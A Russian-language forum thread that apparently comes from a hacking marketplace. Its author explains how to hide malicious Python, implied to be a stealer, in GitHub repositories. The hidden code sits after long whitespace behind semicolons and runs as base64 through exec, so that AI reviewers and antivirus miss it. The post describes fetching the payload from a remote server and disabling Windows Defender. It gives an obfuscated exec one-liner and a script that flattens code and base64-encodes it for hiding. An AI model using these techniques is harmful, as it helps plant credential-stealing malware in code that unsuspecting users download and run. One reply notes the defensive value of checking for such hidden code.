Загрузка...

Как теперь проливают гитхаб или как открытые python скрипты могу посадить вас на *******

Тема в разделе Статьи создана пользователем Хаус 25 авг 2024. (поднята 25 ноя 2024) 871 просмотр

Сортировать
  1. Хаус
    Кому понравилось (9)
    Хаус Автор темы 25 авг 2024 Продам отдел диагностики 305 15 сен 2019
    Привет! :animewave:
    Не так давно наткнулся на интересную вещь:
    Все мы знаем, что в нашем любимом питоне можно использовать точки с запятой, как и писать весь скрипт в одну строчку (ахуеть).
    Да, это не выглядит так, что это можно использовать в корыстных целях, да и по PEP8 такое не разрешается. Но давайте честно: в ваших скриптах вас давно волновал PEP8? Меня к сожалению, не слишком (по моему говнокоду понятно)
    Ближе к сути:
    Что выведет данный скрипт?
    [IMG]
    ⁡Hello World!
    ⁡? Если вы ответили так, то вы частично правы, :arnold: но есть загвоздка…
    Никак не меняя скрипт, в выводе мы получаем это:
    [IMG]
    Откуда же взялся lolzteam? :em:

    Да, возможно, некоторые уже догадались, в чем дело.
    Всем кто все еще не понял, где хранится print('lolzteam'), давайте разберем по полкам:
    Т.к. в питоне мы имеем право разделять линии точкой с запятой, значит мы можем и увести на какую угодно длину, после чего прописать весь наш злой скрипт :shreklol:
    [IMG]
    А # type: ignore нам нужен для предотвращения предупреждений со стороны IDE (К примеру VSC) (на пайчарме это вроде как не работает, вуху!)
    В любой строке мы можем сделать такой "подарок", докинув это какой-нибудь шифровкой base64, к примеру, чтобы всякие чатыгпт не ругались
    Ладно, я бы не так сильно об этом задумывался, но если не репортить такие шифрованные репы гитхаба, получится так себе, ибо с тем же base64, репозитории будут храниться, как ни в чем не бывало.

    Вкратце говоря, подшифруя код при помощи base64 и выполняя его с помощью exec, вирус не обнаружит GPT (как некоторые любят проверять), а учитывая то, что не компилированные python-скрипты почти не определяются антивирусами как потенциально опасные, *******ы на питоне обретают новый смысл :gigachad:
    Безусловно, минус в полной открытости *******а остаётся, но никто не запрещает вам отрубать защитник виндоус и подгружать какой угодно файл, хоть .exe и исполнять его

    P.s.: В теме должен был быть один из разборов такого *******а и слив его исходников,
    [IMG]домен уже снесли, а соответственно и данные *******а тоже (ахуеть, домен на .ru + слово ******* прямо в домене, парень не боялся ничего) :sigma:
    Если есть вопрос, как это реализовать:​
    • Создаём get запрос на сервер, на котором хранится наш актуальный зашифрованный питоне скрипт
    • Расшифровываем и используем его прямо в скрипте используя exec:
    Код:
    Python
    ;import base64;tochno_ne_stiller = base64.b64decode("J3ByaW50KCJsb2x6dGVhbSIpOyBwcmludCgiSSBsb3ZlIEBicmVkY29va2llIik7IHByaW50KCJiZXN0IHRlbGVncmFtIGV2ZXIiKSc=").decode('utf-8').strip("'");exec(tochno_ne_stiller)
    Полный код:

    Вывод:
    [IMG]
    (первые три строки из нашего base64)
    Радуемся жизни и логу (ну или че вы там подкачаете) :cool_bun:
    В дополнение, написал небольшой скрипт, который переработает ваш обычный скрипт в однострочный и переведет в Base64​
    Python
    import base64
    

    
def process_and_encode_py_file(file_path):
    
    with open(file_path, 'r') as file:
    
        lines = file.readlines()
    
    single_line_code = ''.join(line.strip() + ';' for line in lines)
    
    encoded_code = base64.b64encode(single_line_code.encode('utf-8')).decode('utf-8')
    
    return encoded_code
    

    
file_path = input('Enter filename: ')
    
encoded_code = process_and_encode_py_file(file_path)
    
print(encoded_code)
    
with open('converted.rbf', 'a') as file:
    
    file.write(encoded_code)
    
    print('Base64 encoded and writed to converted.rbf')
     
    Этот материал оказался полезным?
    Вы можете отблагодарить автора темы путем перевода средств на баланс
    Отблагодарить автора
    25 авг 2024
    1. Хаус Автор темы
      Хаус, UPD: В convertor py подарков с пробелом нет, не пугайтесь
      25 авг 2024 Изменено
  2. Kenpachi_inactive8655299
    Kenpachi_inactive8655299 25 авг 2024 0 21 авг 2024
    А PEP8 это какой то стандарт языка чтобы его соблюдать?. Я тебя удивлю но это не более чем простая рекомендация к написанию кода
     
    25 авг 2024
    1. Посмотреть предыдущие комментарии (4)
    2. Kenpachi_inactive8655299
      Хаус, стоп, ты даже не удасужился людям рассказать "что такое питон" и весь его синтаксис. Исправляйся
      25 авг 2024
    3. Kenpachi_inactive8655299
      Хаус, А base64, вот людям это не понятно, ждем подробных объяснений. Давай, дерзай
      25 авг 2024 Изменено
    4. Хаус Автор темы
      Kenpachi_inactive8655299, Круто тебя с моего сообщения прорвало)[IMG]
      Извини, не ожидал.
      UPD: Кстати, GPT - не ошибка, ибо его можно расшифровать как Generative pre-trained transformer,
      не стоит все под одну гребенку вести)
      25 авг 2024 Изменено
  3. BlackLime
    Кому понравилось (1)
    BlackLime 27 авг 2024 Заблокирован(а) 345 20 авг 2023
    бля во годнота, спасибо, буду теперь проверять на такие подарки исходы
     
    27 авг 2024
Top
Загрузка...